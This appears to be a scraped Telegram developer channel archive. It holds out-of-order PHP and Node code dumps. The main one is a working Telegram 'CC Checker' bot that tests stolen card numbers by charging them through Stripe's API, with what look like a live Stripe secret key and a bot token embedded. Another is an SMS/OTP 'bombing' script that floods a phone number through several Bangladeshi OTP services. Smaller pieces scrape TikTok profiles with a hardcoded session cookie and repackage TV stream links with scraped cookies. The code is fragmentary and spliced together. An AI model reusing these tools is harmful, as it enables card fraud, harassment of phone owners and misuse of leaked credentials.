Developer House
Открыть в Telegram
Developer House Is a Technology based Channel Which help User To Give Informtaion About ⤏ Android APP Project ⤏ APP Source & Api Related Link ⤏ API Development ⤏ App, Software, Premium Account Giveaway etc.
БольшеНет данных
Подписчики
-224 часа
-167 дней
-4630 день
Архив постов
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CCN Matched ✅</b>%0A<b>Response -» CVV MISSMATCH</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, "transaction_not_allowed")) || (strpos($result2, "transaction_not_allowed"))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CVV Matched ✅</b>%0A<b>Response -» Transaction Not Allowed</b>%0A<b>Gateway -» Stripe Charge ₹$amt</b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, "fraudulent")) || (strpos($result2, "fraudulent"))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Fraudulent</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, "expired_card")) || (strpos($result2, "expired_card"))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Expired Card</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, "generic_declined")) || (strpos($result2, "generic_declined"))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Generic Declined</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);
}
elseif ((strpos($result1, "do_not_honor")) || (strpos($result2, "do_not_honor"))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Do Not Honor</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, 'rate_limit')) || (strpos($result2, 'rate_limit'))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» SK IS AT RATE LIMIT</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, "Your card was declined.")) || (strpos($result2, "Your card was declined."))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Generic Declined</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, ' "message": "Your card number is incorrect."')) || (strpos($result2, ' "message": "Your card number is incorrect."'))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Card Number Is Incorrect</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
else {
sendMessage($chatId, "<b><u><i>Unknown Error. $msg1 - $msg2</i></u></b>", $message_id);
};
}
elseif ((strpos($message, "/cmds") === 0)||(strpos($message, "!cmds") === 0)||(strpos($message, "!command") === 0)||(strpos($message, "!commands") === 0)||(strpos($message, "/commands") === 0)||(strpos($message, "/command") === 0)||(strpos($message, "/cmd") === 0)){
sendMessage($chatId, "<b><i>[Checker Gates]%0A%0ASTRIPE CUSTOM CHARGE -%0A/chk{Amount In $} - xxxxxxxxxxxxxxxx|xx|xx|xxx%0A/inr{Amount In ₹} - xxxxxxxxxxxxxxxx|xx|xx|xxx%0ABIN LOOKUP - /bin - xxxxxx%0ASK CHECK - /sk - sk_live_xxxxxxxxxx@shadowdemon_xd%0A%0A[Tools]%0A%0ATELEGRAM ID/GROUP ID - /id</i></b>", $message_id);
}
//////////=========[Bin Command]=========//////////
$country = GetStr($fim, '"country":{"name":"', '"');
$emoji = GetStr($fim, '"emoji":"', '"');
$scheme = GetStr($fim, '"scheme":"', '"');
$type = GetStr($fim, '"type":"', '"');
if(strpos($fim, '"type":"credit"') !== false){
$bin = 'Credit';
}else{
$bin = 'Debit';
};
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/payment_methods');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_USERPWD, $sk. ':' . '');
curl_setopt($ch, CURLOPT_POSTFIELDS, 'type=card&card[number]='.$cc.'&card[exp_month]='.$mes.'&card[exp_year]='.$ano.'&card[cvc]='.$cvv.'&billing_details[address][line1]=36&billing_details[address][line2]=Regent Street&billing_details[address][city]=Jamestown&billing_details[address][postal_code]=14701&billing_details[address][state]=New York&billing_details[address][country]=US&billing_details[email]='.$mail.'@gmail.com&billing_details[name]=@shadowdemon_xd Mittal');
$result1 = curl_exec($ch);
$tok1 = Getstr($result1,'"id": "','"');
$msg1 = Getstr($result1,'"message": "','"');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/payment_intents');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_USERPWD, $sk. ':' . '');
curl_setopt($ch, CURLOPT_POSTFIELDS, 'amount='.$amount.'¤cy=inr&payment_method_types[]=card&description=@shadowdemon_xd Donation&payment_method='.$tok1.'&confirm=true&off_session=true');
$result2 = curl_exec($ch);
$msg2 = Getstr($result2,'"message": "','"');
$rcp = trim(strip_tags(getStr($result2,'"receipt_url": "','"')));
if(strpos($result2, '"seller_message": "Payment complete."' )) {
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CVV Matched ✅</b>%0A<b>Response -» Successfully Charged ₹$amt ✅</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);
}
elseif(strpos($result2, "insufficient_funds" )) {
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CVV Matched ✅</b>%0A<b>Response -» Insufficient Funds</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, "card_error_authentication_required")) || (strpos($result2, "card_error_authentication_required"))){ sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CVV Matched ✅</b>%0A<b>Response -» 3D Card</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif(strpos($result2,'"cvc_check": "pass"')){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CVV Matched ✅</b>%0A<b>Response -» Payment Cannot Be Completed</b>%0A<b>Gateway -» Stripe Charge ₹$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif(strpos($result2,'"code": "incorrect_cvc"')){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CCN Matched ✅</b>%0A<b>Response -» CVV MISSMATCH</b>%0A<b>Gateway -» Stripe Charge ₹$amt</b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif(strpos($result1,'"code": "incorrect_cvc"')){
elseif ((strpos($result1, "fraudulent")) || (strpos($result2, "fraudulent"))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Fraudulent</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, "expired_card")) || (strpos($result2, "expired_card"))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Expired Card</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, "generic_declined")) || (strpos($result2, "generic_declined"))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Generic Declined</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);
}
elseif ((strpos($result1, "do_not_honor")) || (strpos($result2, "do_not_honor"))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Do Not Honor</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, 'rate_limit')) || (strpos($result2, 'rate_limit'))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» SK IS AT RATE LIMIT</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, "Your card was declined.")) || (strpos($result2, "Your card was declined."))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Generic Declined</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, ' "message": "Your card number is incorrect."')) || (strpos($result2, ' "message": "Your card number is incorrect."'))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» Card Number Is Incorrect</b>%0A<b>Response -» Declined ❌</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
else {
sendMessage($chatId, "<b><u><i>Unknown Error. $msg1 - $msg2</i></u></b>", $message_id);
};
}
elseif ((strpos($message, "/inr") === 0)||(strpos($message, "!inr") === 0)||(strpos($message, ".inr") === 0)){
$message = substr($message, 4);
$amt = multiexplode(array("/", ":", " ", "|"), $message)[0];
$cc = multiexplode(array(":", "/", " ", "|"), $message)[1];
$mes = multiexplode(array(":", "/", " ", "|"), $message)[2];
$ano = multiexplode(array(":", "/", " ", "|"), $message)[3];
$cvv = multiexplode(array(":", "/", " ", "|"), $message)[4];
if (empty($amt)) {
$amt = '100';
}
$amount = $amt * 100;
$lista = ''.$cc.'|'.$mes.'|'.$ano.'|'.$cvv.'';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: lookup.binlist.net',
'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '');
$fim = curl_exec($ch);
$bank = GetStr($fim, '"bank":{"name":"', '"');
$name = GetStr($fim, '"name":"', '"');
$brand = GetStr($fim, '"brand":"', '"');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_USERPWD, $sk. ':' . '');
curl_setopt($ch, CURLOPT_POSTFIELDS, 'type=card&card[number]='.$cc.'&card[exp_month]='.$mes.'&card[exp_year]='.$ano.'&card[cvc]='.$cvv.'&billing_details[address][line1]=36&billing_details[address][line2]=Regent Street&billing_details[address][city]=Jamestown&billing_details[address][postal_code]=14701&billing_details[address][state]=New York&billing_details[address][country]=US&billing_details[email]='.$mail.'@gmail.com&billing_details[name]=@shadowdemon_xd Mittal');
$result1 = curl_exec($ch);
$tok1 = Getstr($result1,'"id": "','"');
$msg1 = Getstr($result1,'"message": "','"');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/payment_intents');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_USERPWD, $sk. ':' . '');
curl_setopt($ch, CURLOPT_POSTFIELDS, 'amount='.$amount.'¤cy=usd&payment_method_types[]=card&description=@shadowdemon_xd Donation&payment_method='.$tok1.'&confirm=true&off_session=true');
$result2 = curl_exec($ch);
$msg2 = Getstr($result2,'"message": "','"');
$rcp = trim(strip_tags(getStr($result2,'"receipt_url": "','"')));
if(strpos($result2, '"seller_message": "Payment complete."' )) {
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CVV Matched ✅</b>%0A<b>Response -» Successfully Charged $$amt ✅</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);
}
elseif(strpos($result2, "insufficient_funds" )) {
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CVV Matched ✅</b>%0A<b>Response -» Insufficient Funds</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, "card_error_authentication_required")) || (strpos($result2, "card_error_authentication_required"))){ sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CVV Matched ✅</b>%0A<b>Response -» 3D Card</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif(strpos($result2,'"cvc_check": "pass"')){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CVV Matched ✅</b>%0A<b>Response -» Payment Cannot Be Completed</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif(strpos($result2,'"code": "incorrect_cvc"')){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CCN Matched ✅</b>%0A<b>Response -» CVV MISSMATCH</b>%0A<b>Gateway -» Stripe Charge $$amt</b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif(strpos($result1,'"code": "incorrect_cvc"')){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CCN Matched ✅</b>%0A<b>Response -» CVV MISSMATCH</b>%0A<b>Gateway -» Stripe Charge $$amt </b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}
elseif ((strpos($result1, "transaction_not_allowed")) || (strpos($result2, "transaction_not_allowed"))){
sendMessage($chatId, "<b>Card: <code>$lista</code></b>%0A<b>Status -» CVV Matched ✅</b>%0A<b>Response -» Transaction Not Allowed</b>%0A<b>Gateway -» Stripe Charge $$amt</b>%0A%0A<b>⋆ Checked By:</b> @$usernam%0A%0A<b>⋆ Bot By: @shadowdemon_xd</b>", $message_id);}CC Checker.
<?php
////////////////=============[@shadowdemon_xd CHK BOT]=============////////////////
$botToken = "6836353909:AAFAyRqCXlGue4YdTI0iuJRRkn1IPOvlWhA"; // Enter ur bot token
$website = "https://api.telegram.org/bot".$botToken;
error_reporting(0);
$update = file_get_contents('php://input');
$update = json_decode($update, TRUE);
$print = print_r($update);
$chatId = $update["message"]["chat"]["id"];
$gId = $update["message"]["from"]["id"];
$userId = $update["message"]["from"]["id"];
$firstname = $update["message"]["from"]["first_name"];
$lastname = $update["message"]["from"]["last_name"];
$username = $update["message"]["from"]["username"];
$message = $update["message"]["text"];
$message_id = $update["message"]["message_id"];
$premiums = file_get_contents('users.txt');
$premium = explode("\n", $premiums);
$group = file_get_contents('groups.txt');
$groups = explode("\n", $group);
if($userId == '1991559687') {
$usernam = ''.shadowdemon_xd.'%0A [Owner]';
}
elseif($userId == '1386134927') {
$usernam = ''.mtchex.'%0A [Owner]';
}
else {
$usernam = $username;
}
$sk = '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';
function GetStr($string, $start, $end){
$str = explode($start, $string);
$str = explode($end, $str[1]);
return $str[0];
};
function multiexplode($delimiters, $string)
{
$one = str_replace($delimiters, $delimiters[0], $string);
$two = explode($delimiters[0], $one);
return $two;
}
function random_strings($length_of_string)
{
$str_result = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
return substr(str_shuffle($str_result),
0, $length_of_string);
}
$mail = 'shadowdemo2w'.random_strings(6).'';
//////////=========[Start Command]=========//////////
if ((strpos($message, "/info") === 0)||(strpos($message, "!start") === 0)||(strpos($message, "!id") === 0)||(strpos($message, "!info") === 0)||(strpos($message, "/id") === 0)||(strpos($message, "/me") === 0)||(strpos($message, "/start") === 0)){
sendMessage($chatId, "<b>Telegram ID:</b> <code>$userId</code>%0A<b>Group ID: </b><code>$chatId</code>%0A<b>To Know Commands: /cmds</b>", $message_id);
}
elseif ((strpos($message, "/chk") === 0)||(strpos($message, "!chk") === 0)||(strpos($message, ".chk") === 0)){
$message = substr($message, 4);
$amt = multiexplode(array("/", ":", " ", "|"), $message)[0];
$cc = multiexplode(array(":", "/", " ", "|"), $message)[1];
$mes = multiexplode(array(":", "/", " ", "|"), $message)[2];
$ano = multiexplode(array(":", "/", " ", "|"), $message)[3];
$cvv = multiexplode(array(":", "/", " ", "|"), $message)[4];
if (empty($amt)) {
$amt = '1';
}
$amount = $amt * 100;
$lista = ''.$cc.'|'.$mes.'|'.$ano.'|'.$cvv.'';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: lookup.binlist.net',
'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '');
$fim = curl_exec($ch);
$bank = GetStr($fim, '"bank":{"name":"', '"');
$name = GetStr($fim, '"name":"', '"');
$brand = GetStr($fim, '"brand":"', '"');
$country = GetStr($fim, '"country":{"name":"', '"');
$emoji = GetStr($fim, '"emoji":"', '"');
$scheme = GetStr($fim, '"scheme":"', '"');
$type = GetStr($fim, '"type":"', '"');
if(strpos($fim, '"type":"credit"') !== false){
$bin = 'Credit';
}else{
$bin = 'Debit';
};
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/payment_methods');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
// Check if response data is valid
if ($response_data !== null && isset($response_data['userInfo']['user'])) {
// Extract and filter required data
$responseData["username"] = isset($response_data['userInfo']['user']['uniqueId']) ? $response_data['userInfo']['user']['uniqueId'] : '';
$responseData["nickname"] = isset($response_data['userInfo']['user']['nickname']) ? $response_data['userInfo']['user']['nickname'] : '';
$responseData["user_avatar"] = isset($response_data['userInfo']['user']['avatarThumb']) ? $response_data['userInfo']['user']['avatarThumb'] : '';
$responseData["verified"] = isset($response_data['userInfo']['user']['verified']) ? $response_data['userInfo']['user']['verified'] : '';
$responseData["bio_link"] = isset($response_data['userInfo']['user']['bioLink']['link']) ? $response_data['userInfo']['user']['bioLink']['link'] : '';
$responseData["nickname_modify_time"] = isset($response_data['userInfo']['user']['nickNameModifyTime']) ? date('Y-m-d H:i:s', $response_data['userInfo']['user']['nickNameModifyTime']) : '';
$responseData["follower_count"] = isset($response_data['userInfo']['stats']['followerCount']) ? $response_data['userInfo']['stats']['followerCount'] : '';
$responseData["following_count"] = isset($response_data['userInfo']['stats']['followingCount']) ? $response_data['userInfo']['stats']['followingCount'] : '';
$responseData["friends"] = isset($response_data['userInfo']['stats']['friendCount']) ? $response_data['userInfo']['stats']['friendCount'] : '';
$responseData["heart"] = isset($response_data['userInfo']['stats']['heart']) ? $response_data['userInfo']['stats']['heart'] : '';
$responseData["video_count"] = isset($response_data['userInfo']['stats']['videoCount']) ? $response_data['userInfo']['stats']['videoCount'] : '';
$responseData["digg_count"] = isset($response_data['userInfo']['stats']['diggCount']) ? $response_data['userInfo']['stats']['diggCount'] : '';
// Encode filtered data as JSON and print
echo json_encode($responseData);
} else {
echo "Error: Invalid response data";
}
}
}
} else {
echo "Username Parameter Is Empty";
}
?>TikTok Video Info
<?php
function makeCurlRequest($url, $referer, $cookie) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $url,
CURLOPT_HTTPHEADER => array(
'referer: ' . $referer,
'cookie: ' . $cookie
),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTP_VERSION => 3
));
$response = curl_exec($ch);
if ($response === false) {
echo 'Error: ' . curl_error($ch);
}
curl_close($ch);
return $response;
}
if (isset($_GET['username'])) {
$username = $_GET['username'];
// Remove "@" symbol if it exists
if (substr($username, 0, 1) === '@') {
$username = substr($username, 1);
}
// URL and headers for the first request
$tokenUrl = "https://commentpicker.com/actions/token.php";
$referer = 'https://commentpicker.com/tiktok-id.php';
$cookie = 'PHPSESSID=4ik4nqvc14glocmlvgf6ro49qn';
// Make the first request to get the token
$tokenResponse = makeCurlRequest($tokenUrl, $referer, $cookie);
if ($tokenResponse !== false) {
// Extract token from response
$token = $tokenResponse;
// URL for the second request
$apiUrl = "https://commentpicker.com/actions/tiktok.php?type=user&id=" . $username . "&token=" . $token;
// Make the second request to get user data
$userDataResponse = makeCurlRequest($apiUrl, $referer, $cookie);
if ($userDataResponse !== false) {
// Define the response array structure
$responseData = array(
"username" => "", // Add username value here
"nickname" => "", // Add nickname value here
"user_avatar" => "", // Add user_avatar value here
"verified" => "", // Add verified value here
"bio_link" => "", // Add bio_link value here
"nickname_modify_time" => "", // Add nickname_modify_time value here
"follower_count" => "", // Add follower_count value here
"following_count" => "", // Add following_count value here
"friends" => "", // Add friends value here
"heart" => "", // Add heart value here
"video_count" => "", // Add video_count value here
"digg_count" => "" // Add digg_count value here
);
// Decode JSON response
$response_data = json_decode($userDataResponse, true);Tsports Tv channel .
Vlc MediaPlayer & Android app "Network Stream/Ns" & many more online player supported tv channel
const axios = require('axios');
const express = require('express');
const app = express();
const port = 3000;
app.get('/ott', async (req, res) => {
try {
let toffeeResponse = await axios.get('https://raw.githubusercontent.com/Jeshan-akand/Toffee-Channels-Link-Headers/main/toffee_channel_data.json');
let toffeeChannelData = toffeeResponse.data.channels;
let tsportsResponse = await axios.get('https://raw.githubusercontent.com/byte-capsule/TSports-m3u8-Grabber/main/TSports_m3u8_headers.Json');
let tsportsChannelData = tsportsResponse.data.channels;
let combinedChannelData = [...toffeeChannelData, ...tsportsChannelData];
combinedChannelData.sort((a, b) => a.name.toLowerCase().localeCompare(b.name.toLowerCase()));
let formattedChannels = '';
for (let i = 0; i < combinedChannelData.length; i++) {
const channel = combinedChannelData[i];
formattedChannels += `#EXTINF:-1 tvg-chno="${i + 1}" tvg-id="" tvg-logo="${channel.logo}", ${channel.name}\n`;
formattedChannels += `#EXTVLCOPT:http-user-agent=Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.193 Mobile Safari/537.36\n`;
const cookieProperty = 'cookie' in channel.headers ? 'cookie' : 'Cookie';
formattedChannels += `#EXTHTTP:${JSON.stringify({ [cookieProperty]: channel.headers[cookieProperty] })}\n`;
formattedChannels += `${channel.link}\n`;
}
res.send(formattedChannels);
} catch (error) {
console.error('Error fetching API:', error);
res.status(500).send('Internal Server Error');
}
});
app.get('/ns', async (req, res) => {
try {
let toffeeResponse = await axios.get('https://raw.githubusercontent.com/Jeshan-akand/Toffee-Channels-Link-Headers/main/toffee_channel_data.json');
let toffeeChannelData = toffeeResponse.data.channels;
let tsportsResponse = await axios.get('https://raw.githubusercontent.com/byte-capsule/TSports-m3u8-Grabber/main/TSports_m3u8_headers.Json');
let tsportsChannelData = tsportsResponse.data.channels;
let combinedChannelData = [...toffeeChannelData, ...tsportsChannelData];
combinedChannelData.sort((a, b) => a.name.toLowerCase().localeCompare(b.name.toLowerCase()));
let formattedChannels = [];
for (let i = 0; i < combinedChannelData.length; i++) {
const channel = combinedChannelData[i];
const cookieProperty = 'cookie' in channel.headers ? 'cookie' : 'Cookie';
formattedChannels.push({
name: channel.name,
link: channel.link,
logo: channel.logo,
origin: channel.link.substring(0, channel.link.indexOf('/', channel.link.indexOf('//') + 2)),
userAgent: 'Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.193 Mobile Safari/537.36',
cookie: channel.headers[cookieProperty]
});
}
res.json(formattedChannels);
} catch (error) {
console.error('Error fetching API:', error);
res.status(500).send('Internal Server Error');
}
});
app.listen(port, () => {
console.log(`Server running on port ${port}`);
});
Peramitter: /ott & /ns<?php
if (isset($_GET["phone"]) && isset($_GET["amount"])) {
$amount = $_GET["amount"];
$mobile = $_GET["phone"];
if ($amount > 0 && strlen($mobile) == 11) {
$c = 0;
$apis = array(
array(
'method' => 'GET',
'url' => 'https://backoffice.ecourier.com.bd/api/web/individual-send-otp?mobile=' . $mobile,
),
array(
'method' => 'POST',
'url' => 'http://weblogin.grameenphone.com/backend/api/v1/otp',
'body' => 'msisdn=' . $mobile,
'headers' => array(
'Content-Type: application/json'
),
),
array(
'method' => 'POST',
'url' => 'https://da-api.robi.com.bd/da-nll/otp/send',
'body' => 'msisdn=88' . $mobile,
'headers' => array(
'Content-Type: application/json'
),
),
array(
'method' => 'POST',
'url' => 'https://api.osudpotro.com/api/v1/users/send_otp',
'body' => 'mobile=+88-' . $mobile . '& deviceToken=web&language=en&os=web',
'headers' => array(
'Content-Type: application/json'
),
),
array(
'method' => 'GET',
'url' => 'http://45.114.85.19:8080/v3/otp/send?msisdn=88' . $mobile,
'headers' => array(
'Content-Type: application/json',
'Host: google.com',
),
),
array(
'method' => 'GET',
'url' => 'https://www.shwapno.com/WebAPI/CRMActivation/Validate?Channel=W&otpCRMrequired=false&otpeCOMrequired=true&smssndcnt=8&otpBasedLogin=false&LoyaltyProvider=&MobileNO=' . $mobile . '&countryPhoneCode=%2B88',
),
array(
'method' => 'POST',
'url' => 'https://ss.binge.buzz/otp/send/login',
'body' => 'phone=' . $mobile,
)
);
$responses = array();
#foreach ($apis as $api) {
while ($c < $amount) {
foreach ($apis as $api) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $api['url']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if (isset($api['method']) && $api['method'] === 'POST') {
curl_setopt($ch, CURLOPT_POST, 1);
if (isset($api['body'])) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $api['body']);
}
}
// Set headers if available
if (isset($api['headers'])) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $api['headers']);
}
$output = curl_exec($ch);
$responses[] = json_decode($output, true);
curl_close($ch);
$c += 1;
}
}
echo json_encode(array('status' => 'success', 'message' => 'Processing Bombing Request...', 'responses' => $responses));
} else {
echo json_encode(array('status' => 'error', 'message' => 'Invalid Number or Amount is null'));
}
} else {
